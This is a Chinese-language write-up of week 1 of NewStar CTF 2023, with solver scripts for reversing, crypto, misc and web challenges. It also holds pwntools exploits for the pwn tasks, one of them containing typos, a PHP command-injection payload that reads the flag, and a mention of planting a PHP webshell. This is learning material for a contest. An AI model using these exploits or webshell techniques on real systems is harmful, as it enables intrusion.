newstar2023 week1
RE
easy_RE
确实是打开就有
flag{we1c0me_to_rev3rse!!}
elf
inputString 先异或然后+16 然后base64encode后和flag cmp,decode后-16 异或就好了
s1 = (char *)base64_encode(v6, v3);
if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_BYTE *__fastcall encode(const char *a1)
{
size_t v1; // rax
int v2; // eax
_BYTE *v4; // [rsp+20h] [rbp-20h]
int i; // [rsp+28h] [rbp-18h]
int v6; // [rsp+2Ch] [rbp-14h]
v1 = strlen(a1);
v4 = malloc(2 * v1 + 1);
v6 = 0;
for ( i = 0; i < strlen(a1); ++i )
{
v2 = v6++;
v4[v2] = (a1[i] ^ 0x20) + 16;
}
v4[v6] = 0;
return v4;
}
import base64
def custom_base64_decode(encoded_str):
custom_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
standard_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
translation = str.maketrans(custom_base64_chars, standard_base64_chars)
return base64.b64decode(encoded_str.translate(translation))
def xor(encoded_bytes):
decoded_chars = []
for byte in encoded_bytes:
char = chr((byte - 16) ^ 0x20)
decoded_chars.append(char)
return ''.join(decoded_chars)
encoded_str = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
print(xor(custom_base64_decode(encoded_str)))
flag{D0_4ou_7now_wha7_ELF_1s?}
咳
die查壳是upx4.0.2 , 在这里下载https://github.com/upx/upx/releases
然后upx -d filename 脱壳
for ( i = 0i64; ; ++i )
{
v4 = &Str1[strlen(Str1)];
if ( i >= v4 - Str1 )
break;
++Str1[i];
}
if ( !strncmp(Str1, enc, v4 - Str1) )
gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~
大概是吧str1全部++了一边 --回去就好了
flag = "gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"
flag = [c for c in flag]
for i in range(len(flag)):
flag[i] = chr(ord(flag[i]) - 1)
print(flag[i] , end="")
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}
Segments
shift_f7 打开段视图,然后拼接flag
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
AndroXor
关键逻辑在这里,能看到长度,还有异或的操作,只需要根据happyx3 还有 cArr置反就能得到inputString
public String Xor(String str, String str2) {
char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
char[] cArr2 = new char[str.length()];
String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
for (int i = 0; i < str.length(); i++) {
char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
cArr2[i] = charAt;
if (cArr[i] != charAt) {
return "wrong!!!";
}
}
return str3;
}
Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
str2 = "happyx3"
cArr = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
str1 = ''.join([chr(cArr[i] ^ ord(str2[i % len(str2)])) if isinstance(cArr[i], int) else chr(ord(cArr[i]) ^ ord(str2[i % len(str2)])) for i in range(len(cArr))])
print(str1)
flag{3z_And0r1d_X0r_x1x1}
Endian
这里v5是个指针来的,一开始看有些怪,过一会就懂了。需要再异或一次,然后按字节拆分数字,小端序转大端序就好了
int __cdecl main(int argc, const char **argv, const char **envp)
{
int i; // [rsp+4h] [rbp-3Ch]
char *v5; // [rsp+8h] [rbp-38h]
char v6[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v7; // [rsp+38h] [rbp-8h]
v7 = __readfsqword(0x28u);
puts("please input your flag");
__isoc99_scanf("%s", v6);
v5 = v6;
for ( i = 0; i <= 4; ++i )
{
if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
{
printf("wrong!");
exit(0);
}
v5 += 4;
}
printf("you are right");
return 0;
}
def process_and_combine(hex_values):
xor_results = [hex(int(value, 16) ^ 0x12345678) for value in hex_values]
reversed_strings = []
for xor_result in xor_results:
xor_result = xor_result[2:].rjust(8, '0')
result_string = "".join([chr(int(xor_result[i:i + 2], 16)) for i in range(0, 8, 2)])
reversed_strings.append(result_string[::-1])
combined_string = "".join(reversed_strings)
return combined_string
flag = ["75553A1E", "7B583A03", "4D58220C", "7B50383D", "736B3819"]
inputString = process_and_combine(flag)
print(inputString)
flag{llittl_Endian_a}
EzPE
修复pe头的话,找个exe 010edit从开始到0x70h那一行粘贴一下,就好了
异或置反一下就好了
data = [
0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D
]
input_recovered = [0] * len(data)
input_recovered[-1] = data[-1]
for i in range(len(data) - 2, -1, -1):
input_recovered[i] = data[i] ^ (i ^ input_recovered[i + 1])
for i in input_recovered:
print(chr(i),end="")
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
lazy_activtiy
activtiy是提供用户界面,可以使用户交互的,程序中有个flag activtiy但是主界面没有什么地方能够调用这个activity的搜了一下可以用
am start -n com.droidlearn.activity_travel/com.droidlearn.activity_travel.FlagActivity
这个命令adb shell的命令来调用一个应用的activtiy
这边是flag activity的关键逻辑,可以反编译然后将10000改成1就好了。但是折腾了好久apktools反编译打包有问题,还有签名那,后面找了一个安卓修改大师破解版,一键打包签名就正常了
public void onClick(View view) {
textView.setText(Integer.toString(FlagActivity.access$004(FlagActivity.this)));
if (FlagActivity.this.cnt >= 10000) {
Toast.makeText(FlagActivity.this, editText.getText().toString(), 0).show();
}
}
flag{Act1v1ty_!s_so00oo0o_Impor#an#}
pwn
ret2text
有个backdoor函数,溢出后跳过去就好了
from pwn import *
from LibcSearcher import *
elf = context.binary = ELF('./ret2text')
#
ip = "node4.buuoj.cn"
port = 29750
# p = process()
p = remote(ip,port)
line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic
backdoor_address = 0x4011FB
payload = b'a' * (32 + 8)
paylaod += backdoor_adress
p.sendline(payload)
p.interactive()
ezshellcode
shellcode输入后会直接jmp到buf那,所以只需要把shellcode输入就好了
from pwn import *
from LibcSearcher import *
elf = context.binary = ELF('./ezshellcode')
#
ip = "node4.buuoj.cn"
port = 29750
# p = process()
p = remote(ip,port)
context(arch='amd64', os='linux')
line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic
shellcode = asm(shellcraft.sh())
payload = shellcode
p.sendline(payload)
p.interactive()
newstar shop
选1进商店买到没钱然后选3 -50后,uint溢出就能直接买/bin sh了
flag{8b42af7c-c695-489a-ad79-1bff9d84f52c}
p1eee
咱是笨蛋,习惯性看ida中的函数视图了,没注意到关键函数下面有个用_asm{}写的直接system bin sh的块,pie的话低三位16进制的地址是不变的,所以只需要在return位置那填充低位地址,根据原有的高位地址,就能跳过去。
.text:0000000000001264 ; __unwind {
.text:0000000000001264 endbr64
.text:0000000000001268 push rbp
.text:0000000000001269 mov rbp, rsp
.text:000000000000126C lea rdi, aBinSh ; "/bin/sh"
.text:0000000000001273 call _system
.text:0000000000001278 nop
.text:0000000000001279 pop rbp
.text:000000000000127A retn
.text:000000000000127A ; } // starts at 1264
from pwn import *
elf = context.binary = ELF('./p1eee')
ip = "node4.buuoj.cn"
port = 26886
context.log_level = 'debug'
# p = process()
p = remote(ip,port)
line = p.recvline(); print(line)
payload = b'a' * (32 + 8) + p8(0x6C)
p.sendline(payload)
p.interactive()
flag{cc6d8d8e-cae4-4f5d-88b5-8ddd66f66a2c}
Random
可以用ctypes 调用libc中的time srand rand函数,校园网好卡,去外边才打通了,要多跑几遍,随机数拼凑字符对了才可以
https://blog.csdn.net/qq_29912475/article/details/130319284
from pwn import *
import ctypes
elf = context.binary = ELF('./Random')
context.log_level = 'debug'
libc = ctypes.CDLL("libc.so.6")
ip = "node4.buuoj.cn"
port = 25248
p = remote(ip,port)
# p = process()
#初始化函数返回值
libc.time.restype = ctypes.c_long
libc.srand.argtypes = [ctypes.c_uint]
#调用函数
time_value = ctypes.c_longlong(0)
seed = libc.time(ctypes.byref(time_value))
libc.srand(seed)
rand_result = libc.rand()
line = p.recvline(); print(line)
p.sendline(str(rand_result))
p.interactive()
flag{f5be13ec-f7f0-4dea-ab64-31470e102fbf}
Crypto
brainfuck
可以用这个解密 https://ctf.bugku.com/tool/brainfuck
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Caesar's Secert
想到偏移量,凯撒密码,https://ctf.bugku.com/tool/caesar 偏移5解出flag
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
Fence
栅栏密码 https://www.qqxiuzi.cn/bianma/zhalanmima.php 解密
flag{reordering_the_plaintext#686f8c03}
Vigenère
def vigenere_decrypt_single(char_ciphertext, char_plaintext):
alphabet = "abcdefghijklmnopqrstuvwxyz"
index_ciphertext = alphabet.index(char_ciphertext)
index_plaintext = alphabet.index(char_plaintext)
index_key = (index_ciphertext - index_plaintext) % 26
return alphabet[index_key]
ciphertext = "pqcq"
plaintext = "flag"
key = "".join([vigenere_decrypt_single(ciphertext[i], plaintext[i]) for i in range(4)])
print(key)
跑出来是kfck, 猜测是kfckfc,用kfc解密后拿到flag
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyrsa
Q&A:
1选择N = p * q是因为N有能够唯一分解成p q两个因子的特性
2为什么φ(p) =(p-1)?
是因为p是素数这个特性,所以和p互质的数是p-1个
3 ed≡1(mod φ(N)) 这个是根据扩欧几里得推导出来的
扩欧几里得的定义是 能找到整数x ,y 使得ax + by = gcd(a,b)
e和d是互质的,所以使得 ex + φ(N)y = 1 然后φ(N)y = 0,所以就算出ed≡1(mod φ(N))
http://www.factordb.com/index.php 可以用这个在线的网站分解n,然后求phi n,通过phi n求e的逆元d解密
from Crypto.Util.number import long_to_bytes
# 计算phi n
def calculate_phi_n(factors):
phi_n = 1
for p in factors:
phi_n *= (p - 1)
return phi_n
# 求逆元
def modinv(a, m):
g, x, y = extended_gcd(a, m)
return x % m
def extended_gcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = extended_gcd(b % a, a)
return (g, x - (b // a) * y, y)
def rsa_decrypt(c, n, e, factors):
phi_n = calculate_phi_n(factors)
d = modinv(e, phi_n)
m = pow(c, d, n)
return long_to_bytes(m).decode()
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
factors = [
2217990919, 2338725373, 2370292207, 2463878387, 2706073949,
2794985117, 2804303069, 2923072267, 2970591037, 3207148519,
3654864131, 3831680819, 3939901243, 4093178561, 4278428893
]
decrypted_message = rsa_decrypt(c, n, e, factors)
print(decrypted_message)
babyencoding
part1 和part2有=号,然后part1是大小写字母加数字,2是纯大写字母,应该是base64和32.
part3搜了好久,在这篇文章中找到了https://blog.csdn.net/Retrovich/article/details/90313591 是uuencode编码,在线解密拼接得到flag
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
后面去看了一下群里的crypto入门的文档,发现里面就有uuencode的识别方法
Small d
Michael J. Wiener 觉得很赞 这个搜了一下,有一种针对small d的攻击方式叫维纳攻击
https://blog.csdn.net/rreally/article/details/111092579
import gmpy2
def transform(x, y): # 使用辗转相处将分数 x/y 转为连分数的形式
res = []
while y:
res.append(x // y)
x, y = y, x % y
return res
def continued_fraction(sub_res):
numerator, denominator = 1, 0
for i in sub_res[::-1]: # 从sublist的后面往前循环
denominator, numerator = numerator, i * numerator + denominator
return denominator, numerator # 得到渐进分数的分母和分子,并返回
# 求解每个渐进分数
def sub_fraction(x, y):
res = transform(x, y)
res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res))))) # 将连分数的结果逐一截取以求渐进分数
return res
def get_pq(a, b, c): # 由p+q和pq的值通过维达定理来求解p和q
par = gmpy2.isqrt(b * b - 4 * a * c) # 由上述可得,开根号一定是整数,因为有解
x1, x2 = (-b + par) // (2 * a), (-b - par) // (2 * a)
return x1, x2
def wienerAttack(e, n):
for (d, k) in sub_fraction(e, n): # 用一个for循环来注意试探e/n的连续函数的渐进分数,直到找到一个满足条件的渐进分数
if k == 0: # 可能会出现连分数的第一个为0的情况,排除
continue
if (e * d - 1) % k != 0: # ed=1 (mod φ(n)) 因此如果找到了d的话,(ed-1)会整除φ(n),也就是存在k使得(e*d-1)//k=φ(n)
continue
phi = (e * d - 1) // k # 这个结果就是 φ(n)
px, qy = get_pq(1, n - phi + 1, n)
if px * qy == n:
p, q = abs(int(px)), abs(int(qy)) # 可能会得到两个负数,负负得正未尝不会出现
d = gmpy2.invert(e, (p - 1) * (q - 1)) # 求ed=1 (mod φ(n))的结果,也就是e关于 φ(n)的乘法逆元d
return d
print("该方法不适用")
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = wienerAttack(e, n)
print("d=", d)
求出d后解密flag
from Crypto.Util.number import *
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = 2357048593
flag = pow(c,d,n)
print(long_to_bytes(flag))
babyxor
flag按字节异或上f,需要爆破f,f的范围是一个字节0-255,把0-255按字节异或上c跑一遍就好了
c = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"
c = bytes.fromhex(c)
flag = ""
for key in range(256):
flag = bytes([b ^ key for b in c])
if b"flag" in flag:
print(flag)
Affine
仿射密码,这里要求解的问题是 置反(key[0]*f + key[1]) % modulus 这个操作
可以简化成m = (c -key[1]) * key[0]的模逆,用扩欧几里得来求模逆
from itertools import product
c = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"
c = bytes.fromhex(c)
# 求模逆
def modinv(a, m):
for i in range(1, m):
if (a * i) % m == 1:
return i
return None
for k0, k1 in product(range(256), repeat=2):
k0_inv = modinv(k0, 256)
if k0_inv is None:
continue
decrypted = []
for b in c:
f = ((b - k1) * k0_inv) % 256
decrypted.append(f)
flag = str(bytes(decrypted))
if "flag" in flag:
print(flag)
babyaes
key是由两个相同的长度16字节的字符串组成,bytes_to_long(key) ^ bytes_to_long(iv) ^ 1这里只异或了key的16字节,所以可以算出key,然后用key的低位异或可以算出iv,用iv 和key 使用aes cbc mode就能解出flag
from Crypto.Cipher import AES
from Crypto.Util.number import *
xor = 3657491768215750635844958060963805125333761387746954618540958489914964573229
flag = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
xor = long_to_bytes(xor)
key = xor[:16]*2
iv = bytes_to_long(key[16:]) ^ bytes_to_long(xor[16:])
iv = long_to_bytes(iv)
aes = AES.new(key,AES.MODE_CBC,iv)
flag = aes.decrypt(flag)
print(flag)
Misc
CyberChef's Secret
base32 -> base58 ->base64
flag{Base_15_S0_Easy_^_^}
机密图片
lsb隐写
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
流量!鲨鱼!
看了一下,很多无用http的数据包 用http.response.code == 200筛选后,找到这个
GET /1.php?cmd=base64%20/.ffffllllllll11111144444GGGGGG|base64 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=85usgbksv9rn85kdcsgu5j0903
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
HTTP/1.1 200 OK
Date: Sat, 19 Aug 2023 06:20:45 GMT
Server: Apache/2.4.51 (Debian)
X-Powered-By: PHP/7.3.33
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
然后base64解密两次,拿到flag
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
https://www.cnblogs.com/Hardworking666/p/15866121.html
https://blog.csdn.net/q20010619/article/details/109425270
搜了一下,缺个zip头 https://blog.csdn.net/qq_29566629/article/details/122936177
加上50 4B 03 04后解压,发现结尾有一串base64编码,解密后提示密码是6位数的,
用ARCHPR破解有些问题,搜了一下装了一个Ziperello,破解后拿到flag
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
空白格
在这篇文章找到了解决方法
https://blog.csdn.net/qq_51999772/article/details/122418926
https://vii5ard.github.io/whitespace/
运行得到flag
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}
隐秘的眼睛
silenteye 下载这个工具,然后解密拿到flag
https://www.sqlsec.com/2018/01/ctfwav.html#SilentEye
https://achorein.github.io/silenteye/
flag{R0ck1ng_y0u_63b0dc13a591}
web
泄漏的秘密
用dirmap 发现有个www.zip 和robot 拼接index中的flag和robots的flag后得到flag
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload
有段js的代码检测上传的类型,在firefox里面把js禁用后就能上传php文件了
用一句话木马加蚁剑在根目录下找到flag
flag{e9ed8544-e37e-4c4a-ac21-d7cacf157dbf}
Begin of HTTP
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:2866
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: newstarctf.com
DNT: 1
Connection: close
Referer: newstarctf.com
Cookie: power=ctfer
X-Real-IP: 127.0.0.1
Upgrade-Insecure-Requests: 1
secret=n3wst4rCTF2023g00000d
flag{5937a957-5910-4eec-91c3-84e1a8911d97}
ErrorFlask
https://www.freebuf.com/articles/network/247503.html
根据提示,用空参数的时候flask就报错了,就把flag泄露出来了
http://98e6da3a-09a5-40e7-bac4-776d4dd52435.node4.buuoj.cn:81/?number1=1&number2=
flag = "flag{Y0u_@re_3enset1ve_4bout_deb8g}"
报错的地方在这里,空参数的时候request.args.get会返回'' 然后int转型就会报错
num1 = request.args.get("number1");
num2 = request.args.get("number2");
return "not ssti,flag in source code~"+str(int(num1)+int(num2))
Begin of PHP
level1用0e绕过 level2传数组过去 level3传数组过去,level4加一个url编码is_numberic就识别不出来了,level5传一个符号就好了
https://blog.csdn.net/qq_46145027/article/details/124514124
https://www.cnblogs.com/zhengna/p/12342124.html
https://www.cnblogs.com/Primzahl/p/6018158.html
http://34cb9ad6-2b68-4fd9-a2fc-9a6698c8b0c5.node4.buuoj.cn:81/?key1=QNKCDZO&key2=s878926199a&key4[]=1&key5=2024%20
post: key3[]=@&flag5[]=@
flag{3a48262b-ac99-4f09-85ed-9ac23cec050e}
R!C!E!
password爆破脚本
import hashlib
import itertools
import string
import threading
TARGET_PREFIX = "c4d038"
MAX_LENGTH = 6
CHARSET = string.ascii_lowercase + string.digits
THREADS = 4
def generate_strings(length):
return itertools.product(CHARSET, repeat=length)
def md5(s):
return hashlib.md5(s.encode()).hexdigest()
def check_string(start, end):
for s in itertools.islice(generate_strings(MAX_LENGTH), start, end):
if md5(''.join(s)).startswith(TARGET_PREFIX):
print(f"Found: {''.join(s)}")
return ''.join(s)
return None
def threaded_bruteforce():
total_combinations = len(CHARSET) ** MAX_LENGTH
step = total_combinations // THREADS
threads = []
for i in range(THREADS):
start = i * step
end = (i + 1) * step if i != THREADS - 1 else total_combinations
t = threading.Thread(target=check_string, args=(start, end))
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
# threaded_bruteforce()
print(md5("apofox"))
非法变量名的转换 https://www.cnblogs.com/meng-han/p/16804708.html
phpinfo查看版本后发现可以用拼接函数的方式绕过 https://blog.csdn.net/LYJ20010728/article/details/117469219
password=apofox&e[v.a.l=(sy.(st).em)("ca"."t /fla"."g");
EasyLogin
注册个账户后登录时候有个302的包显示这个,这个是个假的
<!-- 恭喜你找到flag -->
<!-- flag 为下方链接中视频简介第7行开始至第10行的全部小写字母和数字 -->
<!-- https://b23.tv/BV1SD4y1J7uY -->
<!-- 庆祝一下吧! -->
后面尝试去爆破admin,用burp中的brute forcer然后套md5爆破,爆破出来的密码是000000,然后有个302的包里面有flag
flag{3e7dd426-5475-4789-9605-b1fac334af0f}
